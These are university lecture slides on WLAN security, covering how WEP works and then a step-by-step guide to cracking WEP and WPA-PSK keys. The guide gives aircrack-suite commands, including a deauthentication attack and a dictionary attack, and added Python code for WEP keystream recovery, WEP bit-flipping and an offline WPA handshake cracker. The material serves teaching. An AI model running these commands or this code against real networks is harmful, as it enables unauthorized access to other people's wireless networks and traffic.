
WLAN Security: Cracking WEP/WPA

Assoc. Prof. Anan Phonphoem, Ph.D. (รศ. ดร. อนันต์ ผลเพิ่ม) [email protected]

http://www.cpe.ku.ac.th/~anan

Computer Engineering Department

Kasetsart University, Bangkok, Thailand

Wireless LANs 2011

WEP Block Diagram

Encryption block (sender site):
- Plain Text -> Integrity Algorithm (CRC-32) -> Integrity Check Value (ICV); the ICV is appended to the plain text
- Initialization Vector (IV, 24 bits) || Secret Key (40-bit or 104-bit; sold as "64-bit" or "128-bit" WEP once the 24-bit IV is counted in) -> Pseudo-Random Number Generator (RC4) -> Key Sequence
- (Plain Text || ICV) bitwise XOR Key Sequence -> Cipher Text; the IV travels in clear in front of the cipher text

Decryption block (receiver site):
- IV (read from the frame) || Secret Key -> Pseudo-Random Number Generator (RC4) -> Key Sequence
- Cipher Text bitwise XOR Key Sequence -> Plain Text || ICV
- Integrity Algorithm over the recovered Plain Text -> ICV'; the frame is accepted only if ICV' equals the received ICV

WEP – Encoding

(Slide repeats the encryption block of the diagram above: Plain Text -> CRC-32 -> ICV; IV || Secret Key -> RC4 -> Key Sequence; (Plain Text || ICV) XOR Key Sequence -> Cipher Text, with the IV sent in clear.)

WEP Frame

Field         Size      Sent as
Frame Header            clear text
IV Header     4 bytes   clear text: 24-bit IV, 6 pad bits, 2-bit key ID
Frame Body              encrypted
ICV           4 bytes   encrypted (CRC-32 of the frame body)
Trailer FCS   4 bytes   clear text

WEP – Decryption

(Slide repeats the decryption block of the diagram: IV || Secret Key -> RC4 -> Key Sequence; Cipher Text XOR Key Sequence -> Plain Text || ICV; the ICV is recomputed over the plain text and compared with the received one.)
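The WEP pipeline from the slides above, as an added example that is not part of the lecture: a pure-Python WEP encrypt/decrypt (RC4 key sequence from IV || secret key, CRC-32 ICV, bitwise XOR) followed by two attacks that need no key and that the design permits. The 40-bit key, the reused IV and the two messages are constructed test values; the frame layout (3-byte IV, key-ID byte, body, 4-byte ICV) follows the WEP Frame slide.

```python
# Added example (not from the slides): a minimal WEP implementation following the
# block diagram (CRC-32 ICV, RC4 key sequence from IV || key, bitwise XOR), plus two
# attacks that need no key: key-sequence recovery from a known plain text (IV reuse)
# and ICV-preserving bit flipping (CRC-32 is affine). Key, IV and messages below
# are constructed test data, not captured traffic.
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key sequence of `length` bytes: key scheduling, then output generation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the plain text, sent little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Sender site. Returns the frame body: IV header (IV + key-ID byte) in clear,
    then RC4(IV || key) XOR (plain text || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 40-bit or 104-bit secret key
    payload = plaintext + icv(plaintext)
    key_id = b"\x00"  # 6 pad bits + 2-bit key index; key 0 here
    return iv + key_id + xor(payload, rc4(iv + key, len(payload)))


def wep_decrypt(key: bytes, frame_body: bytes):
    """Receiver site: regenerate the key sequence from the clear IV, XOR, then
    verify the ICV. Returns the plain text, or None if the ICV check fails."""
    iv, cipher = frame_body[:3], frame_body[4:]
    payload = xor(cipher, rc4(iv + key, len(cipher)))
    plaintext, received = payload[:-4], payload[-4:]
    return plaintext if icv(plaintext) == received else None


def recover_keystream(frame_body: bytes, known_plaintext: bytes) -> bytes:
    """Eavesdropper who knows one frame's plain text (e.g. a predictable ARP or
    DHCP frame) gets the key sequence for that IV without the key; every other
    frame sent under the same 24-bit IV can then be read with it."""
    return xor(frame_body[4:], known_plaintext + icv(known_plaintext))


def flip_bits(frame_body: bytes, delta: bytes) -> bytes:
    """Attacker modifies an encrypted frame so it still passes the ICV check.
    CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of len(p)), and
    XOR with the key sequence commutes with this, so the encrypted ICV can be
    patched without knowing the key sequence."""
    iv_hdr, cipher = frame_body[:4], frame_body[4:]
    body, enc_icv = cipher[:-4], cipher[-4:]
    assert len(delta) == len(body)
    fix = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return iv_hdr + xor(body, delta) + xor(enc_icv, struct.pack("<I", fix & 0xFFFFFFFF))


def demo():
    key = b"\x01\x02\x03\x04\x05"  # constructed 40-bit key
    iv = b"\x0a\x0b\x0c"           # the same IV reused for two frames
    msg1 = b"PAY alice 0100 USD"
    msg2 = b"PAY bob   0250 USD"
    frame1 = wep_encrypt(key, iv, msg1)
    frame2 = wep_encrypt(key, iv, msg2)
    assert wep_decrypt(key, frame1) == msg1
    # IV reuse: knowing msg1 reveals the key sequence, which decrypts frame2.
    leaked = xor(frame2[4:], recover_keystream(frame1, msg1))[:-4]
    # Bit flipping: change the amount "0100" -> "9100" without the key.
    delta = bytearray(len(msg1))
    delta[10] = ord("0") ^ ord("9")
    forged = wep_decrypt(key, flip_bits(frame1, bytes(delta)))
    return leaked, forged


if __name__ == "__main__":
    print(demo())
```

demo() returns the second message, decrypted through the recovered key sequence, and the forged first message, whose amount was altered although the receiver's ICV check passed. With only 2^24 IVs, a busy AP repeats them within hours, which is why step 3 of the cracking procedure below is simply collecting traffic.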

Cracking WEP


Cracking Steps

1) Reconnaissance (collect target info.) [kismet]

2) Put the wireless interface into monitor mode (called "promiscuous mode" in these slides) [iwconfig, airmon-ng]

3) Collect data: capture encrypted frames and their IVs [airodump-ng]

4) Crack the key from the collected IVs [aircrack-ng]

Default SSIDs


1) Reconnaissance (Collect target info.)

Kismet (Reconnaissance)

Kismet (AP Info.)

Kismet (Client Info.)

2) Run promiscuous mode

Regular behavior: station 1 transmits to all (broadcast), so stations 2, 3 and 4 all receive the frame.

Intention to eavesdrop: station 1 transmits to station 4 only, but a station whose interface is in promiscuous mode still captures the frame. (On 802.11 the equivalent for capturing raw frames without associating to the AP is monitor mode, which is what airmon-ng configures.)

iwconfig

Promiscuous Mode Setup

3) Collect data

airodump

From Kismet

Airodump problem

root@APMoose:~/toulouse# airodump-ng mon0

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is the interface to the Linux kernel's rfkill subsystem, which enables or disables radio transmitters (Wi-Fi, Bluetooth, ...). A "soft block" is set by software and software can clear it; a "hard block" comes from a physical switch or firmware setting and software cannot clear it.

anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
	Soft blocked: no
	Hard blocked: no
1: acer-wireless: Wireless LAN
	Soft blocked: no
	Hard blocked: no
2: acer-bluetooth: Bluetooth
	Soft blocked: no
	Hard blocked: no
4: hci0: Bluetooth
	Soft blocked: no
	Hard blocked: no

Solve by:

root@APMoose:~/toulouse# rfkill unblock all

(If "Hard blocked: yes" remains after this, the radio is switched off in hardware; use the laptop's wireless switch or function key.)

airodump

airodump data files

4) Crack Key

aircrack

WEP Cracking Demo

Cracking WPA


Cracking Steps

1) Start the wireless interface in monitor mode on the specific AP channel

2) Start airodump-ng on the AP channel, filtered on the BSSID, to collect the authentication (4-way) handshake

3) Use aireplay-ng to deauthenticate a connected wireless client, so that it re-authenticates and produces a fresh handshake

4) Run aircrack-ng with a dictionary to crack the pre-shared key using the captured handshake

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa

1) Start Monitoring Mode

Check interface

iwconfig

Start monitoring mode

2) Start airodump-ng collect authentication handshake

Start airodump-ng

33

Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter                   Description
-c 6                        Wireless channel of the target AP (no channel hopping)
--bssid 00:1E:F7:xx:xx:xx   AP's MAC address; only frames to/from this BSSID are kept
-w psk                      File name prefix for the capture files (psk-01.cap, ...), which contain the IVs / the handshake
mon0                        Monitor-mode interface name

Start airodump-ng with fewer parameters

Moose# airodump-ng -w psk mon0

(Without -c and --bssid, airodump-ng hops across channels and records every network it hears, so it can miss part of the handshake on the target channel.)

3) Deauthenticate client

aireplay

Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter              Description
-0 1                   Deauthentication attack; 1 = number of deauth bursts to send (0 = send continuously)
-a 00:12:01:xx:xx:xx   AP's MAC address (BSSID)
-c 00:23:11:xx:xx:xx   MAC address of the client to deauthenticate
mon0                   Monitor-mode interface name

The deauthenticated client reconnects to the AP and repeats the 4-way handshake, which the running airodump-ng captures.

4) Crack

Need a dictionary

Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap

Run this way, aircrack-ng finds the handshake but stops: unlike WEP, a WPA capture holds no IVs to analyze statistically, so the only attack is to test candidate passphrases against the handshake, which needs a wordlist (-w).

With dictionary

Moose# aircrack-ng -w password.lst psk*.cap

Handshake found

Successfully cracked
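What step 4 actually computes, as an added example that is not part of the lecture or of aircrack-ng: a Python reimplementation of the WPA/WPA2-PSK key derivation (PBKDF2 -> PMK, PRF-512 -> PTK, KCK -> EAPOL-Key MIC) and the offline dictionary attack aircrack-ng runs against the captured handshake. The SSID, MAC addresses, nonces, the EAPOL-Key message 2 bytes and the wordlist are constructed; only the derivation itself is standard, and demo() self-checks it against the PBKDF2 test vector from IEEE 802.11i Annex H.

```python
# Added example (not from the slides or from aircrack-ng): what "crack the
# pre-shared key using the authentication handshake" computes. Per IEEE 802.11i,
# PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the PTK is
# PRF-512(PMK, "Pairwise key expansion", MACs and nonces); the first 16 PTK bytes
# (KCK) key the MIC over the EAPOL-Key frame. The PMK is never transmitted, but a
# captured message 2 (SNonce + MIC) plus message 1 (ANonce) lets an attacker test
# candidate passphrases offline. SSID, MACs, nonces, frame bytes and the wordlist
# below are constructed.
import hashlib
import hmac

# EAPOL hdr 4 + descriptor type 1 + key info 2 + key length 2 + replay counter 8
# + nonce 32 + key IV 16 + RSC 8 + key ID 8 = 81 bytes before the 16-byte MIC.
MIC_OFFSET = 81


def pmk(passphrase: str, ssid: str) -> bytes:
    """Pre-shared key: 4096 rounds of PBKDF2-HMAC-SHA1 salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_desc_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed."""
    if key_desc_version == 1:                                 # WPA / TKIP
        return hmac.new(kck, eapol, hashlib.md5).digest()
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]  # WPA2 / CCMP


def zero_mic(eapol: bytes):
    """Split a captured frame into (frame with MIC zeroed, captured MIC)."""
    return (eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:],
            eapol[MIC_OFFSET:MIC_OFFSET + 16])


def crack(ssid, aa, spa, anonce, snonce, eapol, key_desc_version, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase
    and compare with the captured one. Returns the passphrase or None."""
    zeroed, captured = zero_mic(eapol)
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, key_desc_version), captured):
            return candidate
    return None


def build_msg2(passphrase, ssid, aa, spa, anonce, snonce, key_desc_version):
    """Constructed message 2 of the 4-way handshake as the client would send it:
    EAPOL v1, EAPOL-Key (type 3), RSN descriptor 0x02, key info MIC|Pairwise|version."""
    key_info = (0x0108 | key_desc_version).to_bytes(2, "big")
    frame = (b"\x01\x03\x00\x5f" + b"\x02" + key_info + b"\x00\x10" + bytes(8)
             + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    kck = ptk(pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, key_desc_version)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def demo():
    # Self-check against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").
    assert pmk("password", "IEEE").hex().startswith("f42c6fc52df0ebef")
    ssid = "Moose-WLAN"                   # constructed
    aa = bytes.fromhex("001201aabbcc")    # AP MAC, constructed (slides show 00:12:01:xx:xx:xx)
    spa = bytes.fromhex("002311ddeeff")   # client MAC, constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    captured = build_msg2("kasetsart2011", ssid, aa, spa, anonce, snonce, 2)
    wordlist = ["password", "12345678", "kasetsart2011", "letmein1"]  # stands in for password.lst
    return crack(ssid, aa, spa, anonce, snonce, captured, 2, wordlist)


if __name__ == "__main__":
    print(demo())
```

Each candidate costs 4096 HMAC-SHA1 iterations plus the PRF, which keeps the attack at wordlist speed rather than brute-force speed; since the capture is all the attacker needs, the strength of the passphrase, not of the handshake, decides the outcome.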